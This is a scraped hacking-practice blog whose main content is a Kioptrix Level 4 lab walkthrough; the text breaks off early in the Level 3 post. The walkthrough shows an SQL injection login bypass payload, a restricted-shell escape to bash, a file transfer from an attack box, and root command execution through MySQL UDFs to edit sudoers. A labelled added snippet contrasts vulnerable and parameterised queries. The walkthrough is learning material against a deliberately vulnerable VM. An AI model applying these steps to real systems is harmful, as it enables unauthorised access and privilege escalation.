My Journey in Cyber Security, by Volta Security. Post: Playing with Buffer Overflows (2017-04-20)<div dir="ltr" style="text-align: left;" trbidi="on">
I will not profess to being a ninja in the art of BOF. I understand some C code and get how the stack works. But... exploiting code? Well, that's something I need to work on!<br />
<br />
I decided to revisit <a href="http://overthewire.org/">Overthewire</a> and try my luck with <a href="http://overthewire.org/wargames/narnia/">narnia</a>. Wish me luck!!!!<br />
<br />
I will update as I go along.</div>
Post: Installing Metasploitable 3 (2017-03-02)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://i.ytimg.com/vi/x9hd-Z1avJY/hqdefault.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://i.ytimg.com/vi/x9hd-Z1avJY/hqdefault.jpg" width="320" /></a></div>
<br />
Metasploitable is an awesome VM to practice your skills against, so when Rapid7 released Metasploitable 3 I was excited!!! However, installing it is a pain in the bum 😓 Luckily I found this excellent blog entry, which works a treat. So if you are having issues, follow this and happy hacking!!<br />
<br />
<a href="http://advanced-crm.co.uk/t/metasploitable-3-how-to-install/98">Install Metasploitable 3</a></div>
Post: MS08_067 How it works (2017-02-16)<div dir="ltr" style="text-align: left;" trbidi="on">
MS08_067 is probably one of the most famous exploits out there, but trying to find information on how it actually works can be a nightmare. I came across a brilliant piece of writing from Jason Matthyser at MWR Labs, so I thought I would share it here:<br />
<br />
<iframe height="700" src="https://drive.google.com/file/d/0B-nERnC5GedOZThoY1ZnUFdRb00/preview" width="640"></iframe><br /></div>
Post: Kioptrix Level 4 (2017-02-16)<div dir="ltr" style="text-align: left;" trbidi="on">
Back at the next Kioptrix level. This one was a little bit sneakier than the last one. I had to scratch my head a few times, that's for certain!!<br />
<br />
<b><u>NMap</u></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLpA-fByuSaUFMJac1Hkl2d_Zy0a-QIPY8rj2uZXVa40JxIXy7Mioo84PmdzDsbwU95TcSyG-vzx_kGeS9DQDyMIWstSuY_LnoWWyy9vKwdo0rKNW_JqBG38XTXWuYCCV9HyxcbxFOit4/s1600/Screenshot+from+2017-02-16+10-17-46.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLpA-fByuSaUFMJac1Hkl2d_Zy0a-QIPY8rj2uZXVa40JxIXy7Mioo84PmdzDsbwU95TcSyG-vzx_kGeS9DQDyMIWstSuY_LnoWWyy9vKwdo0rKNW_JqBG38XTXWuYCCV9HyxcbxFOit4/s640/Screenshot+from+2017-02-16+10-17-46.png" width="640" /></a></div>
We can see that the usual ports are open (22, 80), but this time 139 and 445 are open too. The service scan has given me a little bit of info, so it's time to see what else it can yield via Enum4Linux.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGgg3d_xfOBnJO06LbDlEIYMDTu_lioTfh0rTpUXdjcIfPbQOjLSGs43NlehNkM4BrxgT5gfz_aFAx3wCxWgswaLjeTGjuJ3g_AfdvWQ6DKoMaQJYP__one70mVAt2FqgQVg30qLlcRw/s1600/Screenshot+from+2017-02-16+10-21-13.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGgg3d_xfOBnJO06LbDlEIYMDTu_lioTfh0rTpUXdjcIfPbQOjLSGs43NlehNkM4BrxgT5gfz_aFAx3wCxWgswaLjeTGjuJ3g_AfdvWQ6DKoMaQJYP__one70mVAt2FqgQVg30qLlcRw/s640/Screenshot+from+2017-02-16+10-21-13.png" width="640" /></a></div>
<br />
Looks like I have a few users to try. I'll go to the web page and see what awaits.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt2kL3cIku4HYVtPsBCuido5TZvqFfaq5aQDWvHvewNqpN5XGFo30PtBzxxOl7SJEHxGHSe5ic1r2C-uXellKzq6vJgb2GSkSh2eBr8Ai6BHoHmlozKxotnRuQWp5Yc5RXUqNRu82a6a4/s1600/Screenshot+from+2017-02-16+10-18-21.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt2kL3cIku4HYVtPsBCuido5TZvqFfaq5aQDWvHvewNqpN5XGFo30PtBzxxOl7SJEHxGHSe5ic1r2C-uXellKzq6vJgb2GSkSh2eBr8Ai6BHoHmlozKxotnRuQWp5Yc5RXUqNRu82a6a4/s640/Screenshot+from+2017-02-16+10-18-21.png" width="640" /></a></div>
<br />
Just a login page. There is nothing hidden or showing up via Dirb, and Nikto isn't giving much away either.<br />
<br />
I try one of the usernames to see what I get.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6HRLCbIakq-V8r8cbf_WuGw4nhlPT_vAnHqayr2PljwBs_SyxejNr3hNSzX58_-bjOpnpY-vUCq1S0fnTHetNpcxucHxchkQxd5Jg-kV0fHFXndAeetVSedRElBn1Q0GnafqTjMGG6Yk/s1600/Screenshot+from+2017-02-16+13-24-16.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6HRLCbIakq-V8r8cbf_WuGw4nhlPT_vAnHqayr2PljwBs_SyxejNr3hNSzX58_-bjOpnpY-vUCq1S0fnTHetNpcxucHxchkQxd5Jg-kV0fHFXndAeetVSedRElBn1Q0GnafqTjMGG6Yk/s640/Screenshot+from+2017-02-16+13-24-16.png" width="640" /></a></div>
<br />
It looks like it's talking to a database of some kind in the background, so I will try and see if I can get it to error.<br />
<br />
Using:<br />
<br />
<br />
<pre class="brush: bash">username: john
password: 'OR 1=1--
</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8gBRn14WbeefSj57F4rj1VgRgyhftuyexlpDAnen00PW_CNQZXn641scP5Mzz5d8extL_iEbQQvYNmGoYdh2koo04hvdcvAFFN3yMDddwtT5SCkZIPXYoidGwH_xvmXTv-Rfgupba7dw/s1600/Screenshot+from+2017-02-16+13-24-40.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8gBRn14WbeefSj57F4rj1VgRgyhftuyexlpDAnen00PW_CNQZXn641scP5Mzz5d8extL_iEbQQvYNmGoYdh2koo04hvdcvAFFN3yMDddwtT5SCkZIPXYoidGwH_xvmXTv-Rfgupba7dw/s640/Screenshot+from+2017-02-16+13-24-40.png" width="640" /></a></div>
<br />
I get this nice MySQL error :)<br />
<br />
I try hitting the boxes with various SQLi variations but I don't get a hit, so I decide to see if I can modify the request on the fly via Tamper Data.<br />
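As an added example (not code from the original post), here is the kind of login check the payload above targets, written in Python against an in-memory SQLite table standing in for the VM's MySQL database (schema and secrets are constructed): the string-built query beside its parameterised replacement. One caveat: SQLite treats `--` as a comment even without a trailing space, so the post's exact payload bypasses the login here, whereas MySQL requires `-- ` and instead throws the syntax error seen in the screenshot.

```python
import sqlite3

# Constructed stand-in for the VM's login table; schema and secrets are made up.
USERS = [("john", "constructed-secret-1"), ("robert", "constructed-secret-2")]


def make_db() -> sqlite3.Connection:
    """Build the in-memory table the two login functions query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string interpolation: user input is parsed as SQL.

    Returns the matching rows (non-empty means 'logged in'), or the database
    error text when injected quotes leave the statement unbalanced, which is
    exactly the error leak the post uses as its oracle.
    """
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the values, so quotes, OR and --
    arrive as data and can never change the statement's structure."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "'OR 1=1--"  # the password value used in the post
    # AND binds tighter than OR, so the WHERE clause becomes
    # (username='john' AND password='') OR 1=1  ->  every row matches
    print("vulnerable:", login_vulnerable(db, "john", payload))
    # an odd number of quotes leaves the statement unbalanced -> error text
    print("vulnerable:", login_vulnerable(db, "john'", "abc"))
    print("safe:      ", login_safe(db, "john", payload))
```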
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfUu934-qhKno5a_sGFhYtzfCHOFqvD4SXyfptUt6xOYGFqlTlk2Q-4WzWSWrAkha43INytKWh6QPR8CSnBBrCrmP9BMvD-TTuxILOIh7Gftjxnl63QtRM5yHxF4z58d9YQkoR9oOI5-4/s1600/Screenshot+from+2017-02-16+13-34-59.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfUu934-qhKno5a_sGFhYtzfCHOFqvD4SXyfptUt6xOYGFqlTlk2Q-4WzWSWrAkha43INytKWh6QPR8CSnBBrCrmP9BMvD-TTuxILOIh7Gftjxnl63QtRM5yHxF4z58d9YQkoR9oOI5-4/s640/Screenshot+from+2017-02-16+13-34-59.png" width="640" /></a></div>
<br />
Awesome news awaits:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEkH346sn9btFt4vKDmebAJGHkYWWGjKM5wdnA7ZH9hY9k_7WwsAygC7pGjXOpxof35XEKeZz-dw_g36RUpxW_PcKqexQe56p1jBaA6mkOBdRHpics54pIsZh86VHrWq-PMW0tJt7Iorc/s1600/Screenshot+from+2017-02-16+10-24-27.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEkH346sn9btFt4vKDmebAJGHkYWWGjKM5wdnA7ZH9hY9k_7WwsAygC7pGjXOpxof35XEKeZz-dw_g36RUpxW_PcKqexQe56p1jBaA6mkOBdRHpics54pIsZh86VHrWq-PMW0tJt7Iorc/s640/Screenshot+from+2017-02-16+10-24-27.png" width="640" /></a></div>
<br />
I now have potential login credentials.<br />
<br />
I try the same with robert and I get:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWdLj_kH5c4TW39_RyQ0AOavzKF2n4CFJ0GEnlC5ebHwNLFZvFSq4VX-z5A5ASyFo6XGtgSC1cmAWPyMaw8mIrA0rBKOJPVDhX0Y30VyRZn07C2UpmZ6Wfl-1p9JZ7RJrV6HjaB9zhez4/s1600/Screenshot+from+2017-02-16+13-37-38.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWdLj_kH5c4TW39_RyQ0AOavzKF2n4CFJ0GEnlC5ebHwNLFZvFSq4VX-z5A5ASyFo6XGtgSC1cmAWPyMaw8mIrA0rBKOJPVDhX0Y30VyRZn07C2UpmZ6Wfl-1p9JZ7RJrV6HjaB9zhez4/s640/Screenshot+from+2017-02-16+13-37-38.png" width="640" /></a></div>
<br />
The password gives rogue values when I try to decode it as base64, so I decide to try my luck with John's creds on the SSH service.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWGFJIwnFTOSnsL0LMhxXdbDUanpVhY_RzWWPk4MbAP9PdnwV-1x7GhUJJQfKxG1jP45UCf634oBMkPCcuYUBRjZRziX-KfEZQQOlBiJ-pY0J0gMUI0NJ_T2NjQ4U0bp4yMny_biXMkU8/s1600/Screenshot+from+2017-02-16+10-25-04.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWGFJIwnFTOSnsL0LMhxXdbDUanpVhY_RzWWPk4MbAP9PdnwV-1x7GhUJJQfKxG1jP45UCf634oBMkPCcuYUBRjZRziX-KfEZQQOlBiJ-pY0J0gMUI0NJ_T2NjQ4U0bp4yMny_biXMkU8/s640/Screenshot+from+2017-02-16+10-25-04.png" width="640" /></a></div>
<br />
And they work!! This is awesome. But what's this banner about?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh22mpAegLdxR2yAcUjRgXpOsNwSRMB7P9P8wb2ClGV4D3oCNLTImL6g-lA2zOoRZ9_v5Dpl05d8afI0AEP18Vk_E29-b_iX3oU9gAfMNb630OybUqtiT6sYHkPfnTKZ5WG8JkPjeD9D3I/s1600/Screenshot+from+2017-02-16+10-25-25.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh22mpAegLdxR2yAcUjRgXpOsNwSRMB7P9P8wb2ClGV4D3oCNLTImL6g-lA2zOoRZ9_v5Dpl05d8afI0AEP18Vk_E29-b_iX3oU9gAfMNb630OybUqtiT6sYHkPfnTKZ5WG8JkPjeD9D3I/s640/Screenshot+from+2017-02-16+10-25-25.png" width="640" /></a></div>
<br />
Looks like I am in jail!!! I need to break out of my cell. As echo is available I try<br />
<br />
<pre class="brush: bash">echo os.system('/bin/bash')
</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvEy9uxrYGfCPYIvb651D5uD2qltkfaylP6HSdSmFQCEtdSW_6_XUmh_2up6ywBov7Mkv-OTC_sGrf5ibn_aPQ2XoTakKe9PaeYS-CkygIEkOmv2_fqZrUqAFpEpB3olmmNCCOjdqTIw4/s1600/Screenshot+from+2017-02-16+13-44-33.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvEy9uxrYGfCPYIvb651D5uD2qltkfaylP6HSdSmFQCEtdSW_6_XUmh_2up6ywBov7Mkv-OTC_sGrf5ibn_aPQ2XoTakKe9PaeYS-CkygIEkOmv2_fqZrUqAFpEpB3olmmNCCOjdqTIw4/s640/Screenshot+from+2017-02-16+13-44-33.png" width="640" /></a></div>
<br />
I now need to enumerate this box. I could do this manually but automation makes life easier. I look for a way to transfer files:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicA_GCj3yXfBFa5dlAT6VcshymLjYD1ezjddNTbSTBwSUX-bcpfbe5J6DZ7XLmgtik4We7ajiLkrW2zsNxtYPJM13rRMyay5KXjtoW2OAi3RRzhdpX3siKG4XlvnE0chClIUG5-xUENoE/s1600/Screenshot+from+2017-02-16+13-45-16.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicA_GCj3yXfBFa5dlAT6VcshymLjYD1ezjddNTbSTBwSUX-bcpfbe5J6DZ7XLmgtik4We7ajiLkrW2zsNxtYPJM13rRMyay5KXjtoW2OAi3RRzhdpX3siKG4XlvnE0chClIUG5-xUENoE/s640/Screenshot+from+2017-02-16+13-45-16.png" width="640" /></a></div>
<br />
I have a few tools at my disposal here, which is good.<br />
<br />
I try wget against a Python HTTP server on my attack box to pull down <a href="https://github.com/monkeysm8/LinEnum">LinEnum.sh</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKK8K4M5xihI_TKaSwnFVhIyMBMRoUZFPlSWBLL-ZHWWatyo7ek0v4VxA4HmSeBR9QcqbqUKRX4YfjLLpvFBRv7mJZctHujd6ZZiSFgytTAhPjD-TPrX7NBB4DQSCunTAVUGlQmW-AGjM/s1600/Screenshot+from+2017-02-16+13-54-24.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="432" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKK8K4M5xihI_TKaSwnFVhIyMBMRoUZFPlSWBLL-ZHWWatyo7ek0v4VxA4HmSeBR9QcqbqUKRX4YfjLLpvFBRv7mJZctHujd6ZZiSFgytTAhPjD-TPrX7NBB4DQSCunTAVUGlQmW-AGjM/s640/Screenshot+from+2017-02-16+13-54-24.png" width="640" /></a></div>
<br />
Hmmmmm, this doesn't look good. I wonder if there is a rule in place to block this traffic? I'll try netcat.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU9Qg8UEbIS6gsPSZJS6f7aaa8nWalJAHyFFbFZKWtNK8vKMlmDFrGmFQ-TWtdEyk60BV8zPWPximxE_cP3Ft1p_j9qw2HMcFK-qBBRRJGrpCXuwKeOIB4SDeWhCMK09Ti2Z7FQrOc40Q/s1600/Screenshot+from+2017-02-16+13-56-47.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU9Qg8UEbIS6gsPSZJS6f7aaa8nWalJAHyFFbFZKWtNK8vKMlmDFrGmFQ-TWtdEyk60BV8zPWPximxE_cP3Ft1p_j9qw2HMcFK-qBBRRJGrpCXuwKeOIB4SDeWhCMK09Ti2Z7FQrOc40Q/s640/Screenshot+from+2017-02-16+13-56-47.png" width="640" /></a></div>
<br />
That's better!! Now to see what lurks on this box:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ww5ZBRLD_n6CqtJoKoK5nVOdN5JS7z3gk2ibH1yw3odwA_9MxiklmDKuIq2Pzu2mLUHLAyKQsIVZQsmJDXdFa0Q9CuKuwj0mf8O2Rry6HuWqT9cnk2pN2JfJWa86yB7yrlmqgkOPOS8/s1600/Screenshot+from+2017-02-16+13-58-58.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="492" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ww5ZBRLD_n6CqtJoKoK5nVOdN5JS7z3gk2ibH1yw3odwA_9MxiklmDKuIq2Pzu2mLUHLAyKQsIVZQsmJDXdFa0Q9CuKuwj0mf8O2Rry6HuWqT9cnk2pN2JfJWa86yB7yrlmqgkOPOS8/s640/Screenshot+from+2017-02-16+13-58-58.png" width="640" /></a></div>
<br />
MySQL with root privileges! This could be useful:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHLtlKdK1fia0MlIhcSpPOIY22eYz7Ozq0zgbCPE1ETkseEiRFQfdhcEsJqZr8XUsxtOEpmsZjc2qcGD6ZgGT6exVYiyGQwGUhyphenhyphenIdhxrhr5i1wbGhELkLC_M9-aWkVqc7Phz45gATBF74/s1600/Screenshot+from+2017-02-16+13-59-38.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHLtlKdK1fia0MlIhcSpPOIY22eYz7Ozq0zgbCPE1ETkseEiRFQfdhcEsJqZr8XUsxtOEpmsZjc2qcGD6ZgGT6exVYiyGQwGUhyphenhyphenIdhxrhr5i1wbGhELkLC_M9-aWkVqc7Phz45gATBF74/s640/Screenshot+from+2017-02-16+13-59-38.png" width="640" /></a></div>
<br />
I can see the databases, so it's time to see what lurks within:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjav7R_sf266FlVTjzSDgM0H7i2Gdc1phqnFj_jM2sPApy3l0EJN-peO1X4N5QrMqppyIaJCZP8NBKulQn4yuYTR9uxAJOZHcMzHcFZquvNdPasQbqd1RNUEzbSNFZF3KEh2ZrhSDhomqA/s1600/Screenshot+from+2017-02-16+14-00-08.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjav7R_sf266FlVTjzSDgM0H7i2Gdc1phqnFj_jM2sPApy3l0EJN-peO1X4N5QrMqppyIaJCZP8NBKulQn4yuYTR9uxAJOZHcMzHcFZquvNdPasQbqd1RNUEzbSNFZF3KEh2ZrhSDhomqA/s640/Screenshot+from+2017-02-16+14-00-08.png" width="640" /></a></div>
<br />
Nothing I don't already have. I wonder if I can execute commands from within? This <a href="http://bernardodamele.blogspot.nl/2009/01/command-execution-with-mysql-udf.html">BLOG</a> is useful in that regard.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGENpiQ93ZgqpLKrTwNC2uE04gzJzH4CbUIDHQ6Ut1HOkeJN8W2Nl8m8FTzv4n2s6qN1TON9CMAsYfi52eSz_Rz4igE2LoGEWvvNLxmhDQ574Heb5FozKOxQun-x6FzPl1Bb_jOPEsmE4/s1600/Screenshot+from+2017-02-16+14-01-55.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGENpiQ93ZgqpLKrTwNC2uE04gzJzH4CbUIDHQ6Ut1HOkeJN8W2Nl8m8FTzv4n2s6qN1TON9CMAsYfi52eSz_Rz4igE2LoGEWvvNLxmhDQ574Heb5FozKOxQun-x6FzPl1Bb_jOPEsmE4/s640/Screenshot+from+2017-02-16+14-01-55.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLkwgktkRi9xoNxypl2mXEdZ1g19e1CAF6Hkd6ETqbUlPtQ4sLv3stFUL-5Ho64RwbClsSbrz9lDlMGSwTeJv9eQY0mMxkYfy_fNBWenqhf8d5k1tCOooC3Nbqkao-d7hnQsCmestfsFE/s1600/Screenshot+from+2017-02-16+14-02-07.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLkwgktkRi9xoNxypl2mXEdZ1g19e1CAF6Hkd6ETqbUlPtQ4sLv3stFUL-5Ho64RwbClsSbrz9lDlMGSwTeJv9eQY0mMxkYfy_fNBWenqhf8d5k1tCOooC3Nbqkao-d7hnQsCmestfsFE/s640/Screenshot+from+2017-02-16+14-02-07.png" width="640" /></a></div>
<br />
As MySQL is running as root, every command I run through it executes as root, so I can start doing something about my current privileges. The sudoers file seems a good start!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV0IM8Iv0-so9ga9XkIyGvBMjGygwhfi6Oji8aeo5iS6bTwGrmh7iookWo4B-0vwJo4wpJP5oi1RG6B3T7MWUECtg1nzS1KBKmrFZlUQcKJpd0RT7BKn7lZIwLDjftnlkhuPu23pWp5HY/s1600/Screenshot+from+2017-02-16+14-04-48.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV0IM8Iv0-so9ga9XkIyGvBMjGygwhfi6Oji8aeo5iS6bTwGrmh7iookWo4B-0vwJo4wpJP5oi1RG6B3T7MWUECtg1nzS1KBKmrFZlUQcKJpd0RT7BKn7lZIwLDjftnlkhuPu23pWp5HY/s640/Screenshot+from+2017-02-16+14-04-48.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJB3K9YVopnjei9bW647kTj2UOVI9T5v67KsRpHMTp9PZZrJv1BEmutS1D9JzVATrquOtYnwwD0BeHtTZnDeaOhI8xzUAYU13LXV2FR2lpPvDGhm4yZsCi3CiY2G25fMxhxlAKcGPCRt0/s1600/Screenshot+from+2017-02-16+14-04-29.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJB3K9YVopnjei9bW647kTj2UOVI9T5v67KsRpHMTp9PZZrJv1BEmutS1D9JzVATrquOtYnwwD0BeHtTZnDeaOhI8xzUAYU13LXV2FR2lpPvDGhm4yZsCi3CiY2G25fMxhxlAKcGPCRt0/s640/Screenshot+from+2017-02-16+14-04-29.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU88xzQVAfuuW6SIbfhYT8W3R24OE-RvmL6EklehjE6u7gxOUIpyBqcyKxmnZDotW5Iti-8l6WVKL53mLs32TYC7lh74uSXoI5UQVpmjSVIvgfeImTZlkV1nX5DbsN1l8VxQ_iP1fk36w/s1600/Screenshot+from+2017-02-16+14-05-35.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU88xzQVAfuuW6SIbfhYT8W3R24OE-RvmL6EklehjE6u7gxOUIpyBqcyKxmnZDotW5Iti-8l6WVKL53mLs32TYC7lh74uSXoI5UQVpmjSVIvgfeImTZlkV1nX5DbsN1l8VxQ_iP1fk36w/s640/Screenshot+from+2017-02-16+14-05-35.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEittgmchdczzhvJmX2VuAOmLOJE3Iat8lMHBOlmULEfZCfZ9T5fqDYrJduJjTmXfiTHe74uvm8XBaL1nNSGMPYQUjy_oPFUvVVPKsMU6fhldAlNpvNbJe6vdgnwqz-0Nc0-XK5SbLWzGvw/s1600/Screenshot+from+2017-02-16+14-05-55.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEittgmchdczzhvJmX2VuAOmLOJE3Iat8lMHBOlmULEfZCfZ9T5fqDYrJduJjTmXfiTHe74uvm8XBaL1nNSGMPYQUjy_oPFUvVVPKsMU6fhldAlNpvNbJe6vdgnwqz-0Nc0-XK5SbLWzGvw/s640/Screenshot+from+2017-02-16+14-05-55.png" width="640" /></a></div>
<br />
Looks like that worked!!! No exploits to compile or Metasploit modules to run, just old fashioned enumerating and reading. <br />
<br />
I really enjoyed this VM; I think it has been one of my favourites so far.</div>
Post: Kioptrix Level 3 (Don't forget the low hanging fruit) (2017-02-15)<div dir="ltr" style="text-align: left;" trbidi="on">
Back again!!<br />
<br />
I'm continuing with the Kioptrix series as I am really enjoying it. The trouble is... I seem to be overthinking stuff and forgetting this isn't meant to be "difficult". Anyway, enough preamble and more how-to!!!<br />
<br />
<b><u>Scanning</u></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTmPuSIfbU4bo1jFZDsEDojl4aEaeSjy9vpxEURbE8KTRZ0hv4rbYhMHMOsubcdj5G_yjxAxtFgbXG0PpuZjAFtM8kjeoJpJHASOvN3FSHNdsouu6eoYC_PK8PT8vMyLdzpALY4XTfS2w/s1600/Screenshot+from+2017-02-13+11-39-11.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTmPuSIfbU4bo1jFZDsEDojl4aEaeSjy9vpxEURbE8KTRZ0hv4rbYhMHMOsubcdj5G_yjxAxtFgbXG0PpuZjAFtM8kjeoJpJHASOvN3FSHNdsouu6eoYC_PK8PT8vMyLdzpALY4XTfS2w/s320/Screenshot+from+2017-02-13+11-39-11.png" width="320" /></a></div>
<br />
Only ssh and web are open here.<br />
<br />
<b><u>Web Checks</u></b><br />
Browsing to the IP gave me the website below:<br />
<br />
